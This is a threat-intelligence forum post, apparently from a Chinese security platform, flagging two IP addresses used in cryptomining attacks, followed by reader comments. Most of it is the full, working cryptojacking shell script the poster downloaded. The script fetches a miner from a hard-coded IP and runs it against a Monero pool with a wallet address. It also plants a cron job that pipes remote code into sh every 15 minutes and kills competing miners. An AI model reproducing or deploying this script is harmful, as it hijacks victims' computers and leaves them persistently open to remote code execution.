恶意网站
扫描挖矿的两个服务器IP
周鸿祎 2018-01-05 17:33:48 1187人浏览

下面是下载的脚本

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
days=$(($(date +%s) / 60 / 60 / 24))
DoMine()
{
rm -rf /tmp/Silence*
ps -ef|grep Silence |grep -v grep
 if [ $? -ne 0 ]; then
    if [ -x /usr/bin/wget ] ; then
        wget -q http://45.123.190.178/Silence -O /tmp/Silence
    elif [ -x /usr/bin/curl ] ; then
        curl -o /tmp/Silence http://45.123.190.178/Silence
    else
            exit 0;
    fi
    chmod +x /tmp/Silence
    nohup /tmp/Silence -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu -p x -R 1 &>>/dev/null &
    sleep 10
    rm -rf /tmp/Silence

    if [ -x /usr/bin/wget ] ; then
        echo '*/15 * * * * wget -q http://45.123.190.178/lin.txt -O - |sh' > /tmp/.cron
    elif [ -x /usr/bin/curl ] ; then
        echo '*/15 * * * * curl http://45.123.190.178/lin.txt |sh' > /tmp/.cron
    else
            exit 0;
    fi
    crontab -r
    crontab /tmp/.cron
    sleep 3
    rm /tmp/.cron
fi
}

ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill -f yam
pkill -f yam2
pkill -f minerd
pkill -f Circle_MI.png
pkill -f curl
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "11231" || DoMine

ip地址(2) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
评论 18
匿名用户 2018-05-22 16:03:42 回复
还有这种操作?
匿名用户 2018-05-21 16:17:48 回复
不错
匿名用户 2018-05-21 16:11:45 回复
姿势可以
匿名用户 2018-05-21 16:10:22 回复
姿势可以
匿名用户 2018-05-21 16:07:40 回复
学习学习1
h0st 2018-05-21 16:07:08 回复
新姿势学习下。。。
匿名用户 2018-05-21 16:06:19 回复
学习学习
匿名用户 2018-05-21 16:04:32 回复
厉害了
匿名用户 2018-05-21 15:56:54 回复
学习个
匿名用户 2018-05-21 15:50:03 回复
niupi 1
匿名用户 2018-05-21 15:49:06 回复
niupi
匿名用户 2018-05-21 15:47:50 回复
77777
匿名用户 2018-05-21 15:46:45 回复
666
匿名用户 2018-05-21 15:45:27 回复
666
匿名用户 2018-05-21 15:44:21 回复
666
291824029 2018-01-22 11:28:32 回复
。。
路人甲 2018-01-08 13:31:31 回复
不错啊!
fifysky 2018-01-08 09:14:18 回复
教主还在一线工作?